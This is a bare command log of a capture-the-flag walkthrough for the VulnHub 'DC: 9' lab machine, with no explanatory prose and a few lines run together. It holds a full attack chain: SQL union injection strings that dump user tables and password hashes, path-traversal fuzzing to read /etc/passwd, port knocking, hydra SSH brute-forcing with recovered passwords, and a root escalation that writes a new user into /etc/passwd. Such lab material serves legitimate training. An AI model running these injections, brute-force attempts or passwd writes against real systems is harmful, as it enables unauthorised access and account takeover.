VulnHub: DC: 9

nmap -sn 10.0.2.27/24
nmap -Pn 10.0.2.49
nmap -Pn -p1000- 10.0.2.49
nmap -A -p22,80 10.0.2.49
nmap --script vuln -p22,80 10.0.2.49
nikto -h http://10.0.2.49
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.49/ -x php,txt,html,sh,cgi,bak -q
' or 1=1--
' union select 1--
' union select 1,2,3,4,5,6--
' union select 1,@@version,@@hostname,database(),5,6--
' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--
note: the comment terminator is changed from `--` to `-- -` from here on
' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata-- -
' union select 1,2,3,group_concat(table_name,":"),5,6 from information_schema.tables where table_schema='Staff'-- -
' union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name='Users'  and table_schema='Staff'-- -
' union select 1,2,group_concat(UserID,":",Username,":",Password),4,5,6 from Staff.Users-- -
' union select 1,2,3,group_concat(table_name,":"),5,6 from information_schema.tables where table_schema='users'-- -
' union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name='UsersDetails'  and table_schema='users'-- -
' union select 1,2,group_concat(id,':',username,':',password),4,5,6 from users.UserDetails-- -
cat raw.txt | cut -d ":" -f2 > users.txtcat users.txt
cat raw.txt | cut -d ":" -f3 | cut -d "," -f1 > passwords.txtcat passwords.txt
1:admin:856f5de590ef37314e7c3bdf6f8a66dc
wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=index.php
wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" --hw 100 -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=index.php
wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" --hw 100 -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=../../../../../../../etc/passwd
/etc/knockd.conf
for p in 7469 8475 9842; do nmap -n -v0 -Pn --max-retries 0 -p $p 10.0.2.49; done
hydra -L users.txt -P passwords.txt 10.0.2.49 ssh -t 4 -u
ssh janitor@10.0.2.49
password: Ilovepeepee
ls -la
cd .secrets-for-putin
ls -la
cat passwords-found-on-post-it-notes.txt
hydra -L users.txt -P janitor_password.txt 10.0.2.49 ssh -t 4 -u
ssh fredf@10.0.2.49
password: B4-Tru3-001
sudo -l
sudo /opt/devstuff/dist/test/test 
echo "Hello World" > for_readsudo /opt/devstuff/dist/test/test for_read for_appendls -la cat for_append
openssl passwd -1 -salt new password123
nano strings_to_append
sudo /opt/devstuff/dist/test/test strings_to_append /etc/passwd
cat /etc/passwd
su newuser
password: password123
cd /root
ls -la
cat theflag.txt


